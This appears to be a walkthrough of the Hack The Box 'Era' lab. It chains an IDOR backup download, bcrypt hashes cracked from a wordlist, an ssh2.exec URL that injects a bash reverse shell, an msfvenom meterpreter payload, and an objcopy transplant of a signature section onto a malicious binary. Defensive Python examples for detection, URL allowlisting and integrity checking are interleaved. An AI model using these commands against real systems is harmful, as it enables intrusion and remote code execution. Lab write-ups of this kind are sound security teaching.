HTB Season 8 box: era


nmap scan

└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 157.41 seconds

ffuf vhost scan

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'

![[Pasted image 20250728101147.png]]

![[Pasted image 20250728101240.png]]

dirsearch page scan

dirsearch -u http://file.era.htb/

![[Pasted image 20250728102347.png]]

Register an account and log in
![[Pasted image 20250728102402.png]]

IDOR to steal the backup

http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true

![[Pasted image 20250728102941.png]]

We pull down the sqlite3 DB file
![[Pasted image 20250728141506.png]]
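The two download URLs above differ only in `id`, which is the classic IDOR pattern: the endpoint never checks that the requester owns the object. As an added example (not part of the original writeup), the script below shows how a defender would spot this in web server access logs. It parses constructed combined-format log lines and flags any client that requests many distinct `download.php` ids inside a short window; status codes are ignored on purpose, because a vulnerable endpoint answers 200 to every id. The log lines, client IPs and thresholds are all constructed for the example.

```python
"""Flag IDOR-style enumeration of download.php?id=N in web access logs.

Added example (not part of the original writeup). Log lines are constructed in
combined-log format; the client IPs, ids and timestamps are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: 203.0.113.5 walks sequential ids within a few seconds,
# 198.51.100.7 downloads two files minutes apart (normal use).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jul/2025:10:29:01 +0000] "GET /download.php?id=50&dl=true HTTP/1.1" 200 1834
203.0.113.5 - - [28/Jul/2025:10:29:02 +0000] "GET /download.php?id=51&dl=true HTTP/1.1" 200 512
203.0.113.5 - - [28/Jul/2025:10:29:02 +0000] "GET /download.php?id=52&dl=true HTTP/1.1" 200 640
203.0.113.5 - - [28/Jul/2025:10:29:03 +0000] "GET /download.php?id=53&dl=true HTTP/1.1" 200 512
203.0.113.5 - - [28/Jul/2025:10:29:03 +0000] "GET /download.php?id=54&dl=true HTTP/1.1" 200 40960
203.0.113.5 - - [28/Jul/2025:10:29:04 +0000] "GET /download.php?dl=true&id=150 HTTP/1.1" 200 8192
198.51.100.7 - - [28/Jul/2025:10:29:05 +0000] "GET /download.php?id=77&dl=true HTTP/1.1" 200 2048
198.51.100.7 - - [28/Jul/2025:10:31:40 +0000] "GET /download.php?id=78&dl=true HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ID_RE = re.compile(r'/download\.php\?(?:[^ ]*&)?id=(?P<id>\d+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return {ip, ts, id, status} for a download.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    idm = ID_RE.search(m["path"])
    if not idm:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "id": int(idm["id"]),
        "status": int(m["status"]),
    }


def longest_sequential_run(ids):
    """Length of the longest run of consecutive integers among the distinct ids."""
    ids = sorted(set(ids))
    best = run = 1 if ids else 0
    for prev, cur in zip(ids, ids[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def find_enumerators(log_text, window_seconds=60, min_distinct_ids=5):
    """Return {ip: {"ids": [...], "sequential_run": n}} for every client that
    requested at least min_distinct_ids different ids inside any span of
    window_seconds. Status codes are not consulted: a vulnerable endpoint
    returns 200 for every id, so counting 403s would miss the successful case."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        lo = 0
        for hi in range(len(recs)):
            # slide the window start forward until it spans <= window_seconds
            while (recs[hi]["ts"] - recs[lo]["ts"]).total_seconds() > window_seconds:
                lo += 1
            window_ids = {r["id"] for r in recs[lo:hi + 1]}
            if len(window_ids) >= min_distinct_ids:
                all_ids = sorted({r["id"] for r in recs})
                flagged[ip] = {"ids": all_ids,
                               "sequential_run": longest_sequential_run(all_ids)}
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {len(info['ids'])} distinct ids, "
              f"longest sequential run {info['sequential_run']}: {info['ids']}")
```

Detection is the second line of defence; the fix is an ownership check in `download.php` itself (look up the file, compare its owner to the session user, and return 403 or 404 otherwise), and a long sequential run of ids in the output above is a strong hint that such a check is missing.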

Cracking the passwords offline

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

We cannot log in with the credentials from the backup database, so we change the security question answers instead.
![[Pasted image 20250728155554.png]]
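Both hashes above are bcrypt: `$2y$` is the variant PHP's `password_hash()` produces, `$2b$` the current OpenBSD revision used by most other implementations, with cost factors 10 and 12. They still fell to a wordlist because the passwords are dictionary words; the cost factor only slows each guess down. As an added example (not code from the writeup), here is a small parser for the bcrypt modular-crypt format with a cost-factor audit; the `MIN_COST` policy value is an assumption for illustration.

```python
"""Parse bcrypt modular-crypt strings and audit their cost factor.

Added example, not part of the original writeup. The two hashes are the ones
shown above; MIN_COST is an assumed policy value for illustration.
"""
import re
from dataclasses import dataclass

# $<variant>$<cost>$<22-char salt><31-char digest>; salt and digest use bcrypt's
# own base64 alphabet (./A-Za-z0-9), and cost is log2 of the key-setup rounds.
BCRYPT_RE = re.compile(
    r'^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$'
    r'(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$'
)
MIN_COST = 12  # assumed policy threshold for this example

# The hashes recovered from the leaked backup (taken from the writeup above).
LEAKED = [
    "$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm",
    "$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.",
]


@dataclass(frozen=True)
class BcryptHash:
    variant: str   # "2y" = PHP password_hash(); "2b" = current OpenBSD revision
    cost: int      # work factor; each +1 doubles the cost of every guess
    salt: str
    digest: str

    @property
    def rounds(self) -> int:
        return 2 ** self.cost


def parse_bcrypt(s: str) -> BcryptHash:
    """Split a bcrypt string into its fields; raises ValueError if it is not one."""
    m = BCRYPT_RE.match(s.strip())
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m["cost"])
    if not 4 <= cost <= 31:
        raise ValueError(f"cost {cost} outside bcrypt's range 4..31")
    return BcryptHash(m["variant"], cost, m["salt"], m["digest"])


def audit_costs(hashes, min_cost=MIN_COST):
    """Return [(hash_string, cost, meets_policy)] for every hash given."""
    out = []
    for h in hashes:
        parsed = parse_bcrypt(h)
        out.append((h, parsed.cost, parsed.cost >= min_cost))
    return out


def relative_guess_cost(cost_a: int, cost_b: int) -> float:
    """How many times more expensive a single guess is at cost_b than at cost_a."""
    return 2.0 ** (cost_b - cost_a)


if __name__ == "__main__":
    for h, cost, ok in audit_costs(LEAKED):
        print(f"{h[:7]}... cost={cost} {'ok' if ok else 'below policy'}")
```

Raising the cost from 10 to 12 makes every guess four times as expensive, which matters against a brute-force run but does nothing against a wordlist hit like the two above; a cost audit like this belongs next to a password-strength check at registration, not in place of one.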

SSH2 + SSRF = RCE

Log in as admin_ef01cab31aa
![[Pasted image 20250728155620.png]]

Analysing the source shows the vulnerability is at the fopen() call: as long as we hold an administrator account, we control what fopen() opens.
![[Pasted image 20250728161833.png]]

![[Pasted image 20250728161933.png]]

So we can try using the account credentials to execute a command.

http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;

![[Pasted image 20250728162004.png]]
![[Pasted image 20250728162017.png]]
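The root cause here is that the `format` parameter reaches fopen() unfiltered, so every stream wrapper PHP has registered (the `ssh2.exec://` wrapper in this case) is reachable from a request. As an added example, not the application's code, the check below is the validation a defender would put in front of such a call: an allowlist of schemes and hosts, with embedded credentials and loopback or private addresses rejected. It is written in Python so it runs stand-alone; the allowlisted hostname is a placeholder, and the rejected URL is the one from the request above.

```python
"""Validate a user-controlled URL before a URL-aware file open.

Added example, not the application's code. In PHP the same check belongs in
front of fopen() on the `format` parameter; it is written in Python here so it
runs stand-alone. ALLOWED_HOSTS holds a placeholder hostname.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}          # assumed: the only legitimate fetch protocols
ALLOWED_HOSTS = {"files.example.internal"}   # assumed allowlist (placeholder name)
ALLOWED_PORTS = {None, 80, 443}              # None = scheme default

# The URL from the request above: a non-allowlisted wrapper, embedded
# credentials and a loopback target all at once.
OBSERVED = ("ssh2.exec://eric:america@127.0.0.1:22/"
            "bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;")


def check_fetch_url(url, allowed_schemes=ALLOWED_SCHEMES,
                    allowed_hosts=ALLOWED_HOSTS, allowed_ports=ALLOWED_PORTS):
    """Return (ok, reason). Deny by default: anything not explicitly allowed fails."""
    try:
        parts = urlsplit(url)
    except ValueError as e:             # e.g. malformed IPv6 brackets
        return False, f"unparseable URL: {e}"

    scheme = parts.scheme.lower()
    if scheme not in allowed_schemes:   # catches every wrapper, known or not
        return False, f"scheme {scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"

    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None                     # a DNS name, not a literal address
    if addr is not None and not addr.is_global:
        return False, f"address {host} is loopback/private/reserved"
    if host.lower() not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"

    try:
        port = parts.port               # ValueError on a non-numeric/out-of-range port
    except ValueError:
        return False, "invalid port"
    if port not in allowed_ports:
        return False, f"port {port} not allowed"
    return True, "ok"


if __name__ == "__main__":
    for u in (OBSERVED, "http://127.0.0.1/report",
              "https://files.example.internal/report.pdf"):
        print(u[:60], "->", check_fetch_url(u))
```

An allowlist is preferable to a blocklist of wrappers because PHP registers many of them (`stream_get_wrappers()` lists the active set) and extensions add more, as the ssh2 extension did here. For DNS names the resolved address still has to be checked at connect time, otherwise a name that resolves to 127.0.0.1 slips past the literal-address test; and where the application only ever needs a handful of local files, the stronger fix is to map the parameter to fixed paths and not accept URLs at all.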

objcopy: bypassing the sh file self-check

Run linpeas.sh to enumerate
![[Pasted image 20250728163723.png]]

Run pspy64 to watch scheduled tasks
![[Pasted image 20250728164135.png]]

Moreover, the monitor file is writable by us, so we generate a shell payload:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf

Transfer it to the victim machine, then extract monitor's signature (replacing the file directly apparently stops monitor from being run, so we suspect there is a check):

# extract monitor's signature section
objcopy --dump-section .text_sig=sig monitor

# add monitor's signature section to the malicious file
objcopy --add-section .text_sig=sig reverse.elf

Start the msf listener, then copy the bypassed malicious file over monitor:

cp reverse.elf monitor

Finally we get a shell.
![[Pasted image 20250728174208.png]]
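The objcopy step shows why a presence check on a `.text_sig` section is not an integrity check: the section is just bytes, and bytes can be copied onto any ELF. As an added example, not code from the box or the writeup, the script below contrasts that weak check with a tag that is an HMAC-SHA256 over the file's contents, stored as a trailer. A tag lifted from the original and placed on a replacement file passes the presence test and fails verification. The key and both file bodies are constructed stand-ins.

```python
"""An integrity tag that is bound to the file's contents.

Added example, not code from the box or the writeup. The writeup observes that a
.text_sig section copied with objcopy onto another ELF satisfies the scheduled
job's check; a check that only tests for the section's presence can be passed
that way. Here the tag is an HMAC-SHA256 over every byte that precedes it, so a
tag copied from one file does not verify against another. Key and file contents
are constructed.
"""
import hashlib
import hmac

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes

# Constructed material: a verification key and two stand-ins for binary contents.
KEY = b"example-verification-key-not-for-production"
ORIGINAL = b"\x7fELF" + b"legitimate monitor body"
REPLACEMENT = b"\x7fELF" + b"replacement body"


def compute_tag(key: bytes, payload: bytes) -> bytes:
    """HMAC-SHA256 of the payload under the verification key."""
    return hmac.new(key, payload, hashlib.sha256).digest()


def attach_tag(key: bytes, payload: bytes) -> bytes:
    """Append the tag as a trailer (the role .text_sig plays in the writeup)."""
    return payload + compute_tag(key, payload)


def split_tagged(blob: bytes):
    """Separate payload and trailer; None if the blob is too short to hold a tag."""
    if len(blob) < TAG_LEN:
        return None
    return blob[:-TAG_LEN], blob[-TAG_LEN:]


def has_trailer(blob: bytes) -> bool:
    """The weak check: 'is something tag-shaped present?' It passes for any
    payload once a trailer of the right length is attached."""
    return len(blob) >= TAG_LEN


def verify_tagged(key: bytes, blob: bytes) -> bool:
    """The strong check: True only if the trailer is the HMAC of this exact payload."""
    parts = split_tagged(blob)
    if parts is None:
        return False
    payload, tag = parts
    return hmac.compare_digest(compute_tag(key, payload), tag)


def copy_tag_onto(signed_blob: bytes, other_payload: bytes) -> bytes:
    """Mirror the objcopy step: take the tag from a signed file, attach it to another."""
    _, tag = split_tagged(signed_blob)
    return other_payload + tag


def demo():
    """Run both checks against the original and against a file carrying a copied tag."""
    signed = attach_tag(KEY, ORIGINAL)
    transplanted = copy_tag_onto(signed, REPLACEMENT)
    return {
        "original_passes_weak": has_trailer(signed),
        "original_passes_hmac": verify_tagged(KEY, signed),
        "transplant_passes_weak": has_trailer(transplanted),
        "transplant_passes_hmac": verify_tagged(KEY, transplanted),
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

An HMAC means the verifier holds a secret, and if the checker runs as root on the same host where the binary is writable, anyone who can read the key can re-sign; an asymmetric signature with only the public key on the host is the stronger design. Either way the underlying fault, a scheduled job executing a file that an unprivileged user can overwrite, has to be fixed by permissions, not by a signature format.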
